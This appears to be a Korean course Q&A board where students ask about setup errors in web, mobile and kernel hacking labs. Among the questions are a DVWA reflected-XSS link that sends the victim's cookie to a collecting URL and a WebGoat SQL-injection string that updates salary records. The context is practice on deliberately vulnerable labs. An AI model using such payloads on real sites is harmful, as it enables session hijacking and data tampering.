묻고 답해요
158만명의 커뮤니티!! 함께 토론해봐요.
인프런 TOP Writers
-
미해결모의해킹 실무자가 알려주는, XSS 공격 기법
mysql 환경 변수 설정 마지막 단계
일단 mysql 대신 mariadb가 깔려있어서 해당 상황으로 진행중입니다 강의에서는 DB와 information__schema, mysql, sys 등 깔려있는 게 많은데 mariadb로 들어가보니 깔려있는 게 없네요 그러다보니 다음단계인 XSS가 진행이 안되네요 어떤 추가 설정을 해야할까요?
-
미해결화이트해커가 되기 위한 8가지 웹 해킹 기술
이메일 피싱
안녕하세요. Reflected XSS 이메일 피싱 관련해서 실습 중입니다. 스크립트를 입력폼에 직접 넣어서 실행했을 때에는 access_log에 쿠키값이 잘 떴는데, 이메일로 하려니까 아래 사진처럼 됩니다. 이메일에서 입력한 링크는document.location%3d">http://localhost/dvwa/vulnerabilities/xss_r/?name=<script>document.location%3d'http://localhost/cookie%3f'%2bdocument.cookie</script> 입니다.
-
미해결해킹대회(CTF) 출전을 위한 시스템해킹(Pwnable) 입문
hacktheworld 사이트가 들어가지지 않습니다
hacktheworld 사이트가 들어가지지 않습니다. 문제 실습 파일을 받고 싶은데 어떻게 해야할까요?
-
미해결화이트해커가 되기 위한 8가지 웹 해킹 기술
MySQL Database 실행 오류
안녕하십니까.XAMPP 8.x 버전으로 설치하다가 dvwa가 안되어 5.6 버전을 다시 설치하고 강의를 따라하고 있는데,MySQL Database가 Start를 눌러도 Running이 아니라 다시 Stopped로 돌아갑니다. 오류는 어디서 확인할 수 있으며, 어떻게 해결해야하나요?
-
미해결화이트해커가 되기 위한 8가지 웹 해킹 기술
한글폰트 설치와 관련하여 질문 있습니다.
이렇게 sources.list 파일 수정하였는데, 404 not found 에러가 나서 질문 남깁니다.
-
미해결웹 개발자와 정보보안 입문자가 꼭 알아야 할 웹 해킹 & 시큐어 코딩
CSRF 대응방안 궁금 사항 문의
결국에는 공격자가 유도하는 action.php 에 토큰값이 비어있거나, 임의로 요청해도 write.php에서 발급받은 토큰과 일치하지 않아 공격이 실패된 것으로 이해되었습니다.그렇다면 만약에 토큰을 발급받는 페이지인 write.php에서 XSS 가 발생되어 공격자가 토큰값만 알게 된다면 CSRF 취약점이 가능할 까요? 물론 페이로드를 개별 사용자 한명만을 대상으로 토큰값을 요청해야겠지만요
-
미해결안드로이드 모바일 앱 모의해킹과 시큐어코딩
드로저 설치 오류
드로저를 설치했고, 포트 포워딩도 했고, 필요한 라이브러리도 다 다운받았는데요.drozer console connect입력하면 (drozer) C:\Users\juyeon>drozer console connectSelecting 2e2a97ea1be21480 (samsung SM-S9210 9)local variable 'session' referenced before assignment 이렇게 뜹니다.. 어떻게 해결해야 하나요?ㅠ
-
미해결무작정 따라하며 원리를 깨우치는 웹 해킹 : WebGoat 편
학습관련 질문
혹시 이해가 잘 안가는 부분이 있어서 그런데요! 3SL99A';update employees set SALARY=100000 where LAST_NAME='Smith 이렇게 입력하면 구문이 잘 돌아가는걸 알 수 있는데 왜 구지 '가 ;앞에 들어가는지 잘 모르겠습니다.설명 한번만 간략하게라도 부탁드릴게요!! 그리고 저 뒤에 Smith부분에도 왜 뒤에 '가 안붙는지 잘 모르겠습니다
-
미해결웹 개발자와 정보보안 입문자가 꼭 알아야 할 웹 해킹 & 시큐어 코딩
php.ini가 아니라 php가 다운됩니다.
제목처럼 php.ini가 아니라 php가 다운됩니다. 또한 강사님께서 공유하신 것을 다운 받으면 바이러스에 감염된다고 경고가 옵니다. 원인을 아신다면 답변해주시면 감사하겠습니다.
-
미해결IT보안을 위한 와이어샤크 네트워크 패킷 분석 실전
강의 실습 자료는 어디서?
강의 실습 자료를 다운받고 싶습니다.관련 URL 링크나 메일로 보내주세요teamksd@naver.com
-
미해결버그헌팅과 시나리오 모의해킹 전문가 되기
칼리리눅스 버전 문의 입니다.
권한 취득 영상에서 searchploit ubuntu 16.04로 하시는데 제가 25년3월31일에 받은 칼리리눅스에서는 Operating System: Kali GNU/Linux RollingKernel: Linux 6.12.13-amd64Architecture: x86-64 그래서 saerchploit할때 어떻게 검색해야 할지 모르겠습니다 ..ㅠ 강의랑 버전이 다른 부분도 있어서 취약점도 별로 없는거같고 선생님 강의에 있는 칼리는 release 버전이 어떻게 될까요 ??
-
미해결웹 개발자와 정보보안 입문자가 꼭 알아야 할 웹 해킹 & 시큐어 코딩
구문을 썼는데 삭제되지않아요
제가 쓴 게시글 2. 구문작성 한 것 3.응답에서의 반응 4. 삭제가 되지 않았습니다ㅏ 어떻게 해야하나요+혹시나 하고 프록시 설정을 해봤습니다ㅏ
-
미해결웹 개발자와 정보보안 입문자가 꼭 알아야 할 웹 해킹 & 시큐어 코딩
proxy switcher 다운로드 오류..
proxy switcher을 구글에서 검색하여 다운받고 압축 푼 후에 저 응용프로그램 실행하려니 자꾸 막힙니다. 실행이 되어도 license를 구입?하라는 표시만 뜨네요. 제가 잘못 다운로드 한걸까요?
-
미해결웹 개발자와 정보보안 입문자가 꼭 알아야 할 웹 해킹 & 시큐어 코딩
insecure_website 에러
자꾸 warning이 뜨는 이유가 뭘까요..? mysql -u root -p 입력 후 작성하는 패스워드랑 동일하게 common.php에서 변경하고 저장했는데도 저렇게 같은 warning이 나옵니다..!
-
해결됨웹 개발자와 정보보안 입문자가 꼭 알아야 할 웹 해킹 & 시큐어 코딩
취약환경 구축 not found 에러?
mysql 로그인도 했고 query.txt 복사해서 붙여넣기도 잘 했는데 '127.0.0.1/insercure_website' 접속시 저런 오류가 납니다. 어디 문제일까요? 질문 내역 중 저랑 같은오류가 생긴 분이 질문하신거 답변 확인해봤는데도 잘 해결이 안됩니다.!
-
미해결AWS 클라우드 서비스 인프라 구축 이해와 해킹, 보안
워드프레스 접속이안됩니다.
기존에 촬영 영상은 22년 기준이어현재기준 도커컴포스 설치 방법찾아보니워드프레스 접속포트가 -80:80 형식이더군요이미지와 같이 설치하고 docker ps 명령에도정상 ps 출력되고있습니다.다만 저렇게 설정하고 워드프레스 접속시개방주소법의 퍼블릭IP:80 해도 접속이안되며localhost:80 해도 접속이안됩니다.접속안될때 문구는 localhost 에서 연결을 거부했습니다 라고 나옵니다.접속이왜 안되는지 문의드립니다.(영상이 22년 화면 기준이라 현재랑 너무 다른설정이 많아 따라가는데 불편합니다)
-
미해결AWS 클라우드 서비스 인프라 구축 이해와 해킹, 보안
Ip가안나와요
Ec2 설치하고 접속후 ip addr 하면 ip가 보여야되는데 안나옵니다.어떻게해야할까요
-
미해결웹 개발자와 정보보안 입문자가 꼭 알아야 할 웹 해킹 & 시큐어 코딩
mysql 접속 에러
mysql 접속이 계속 오류가 납니다. 비밀번호 'apmsetup'으로 계속 시도해도 오류가 납니다ㅠㅠ구글링해서 나온 방법들도 안 통해서 질문 남깁니다.. !
-
미해결웹 개발자와 정보보안 입문자가 꼭 알아야 할 웹 해킹 & 시큐어 코딩
test' 부분이 실행되지않습니다.
이렇게 off로 바꾸고 재실행 하려고 apacheMonitor를 키려고하는데 이렇게 뜹니다! 그리고 test' 라고 나오는게 아니라 test\' 라고 나옵니다..
-
미해결리눅스 커널 해킹. A부터 Z까지
Stack based BOF 강의에서 질문입니다.
이 강의 전의 기존 ROP방식에서는카나리 다음에 레지스터값들이 저장안되었는데 이번에는 왜 저장될까요?또 위 사진 rop[i++] 14, 15번째(swapgs_restore... 바로 밑)는 왜 0x41414141로 될까요?이것도 저번 강의랑 조금 달라 질문드립니다.
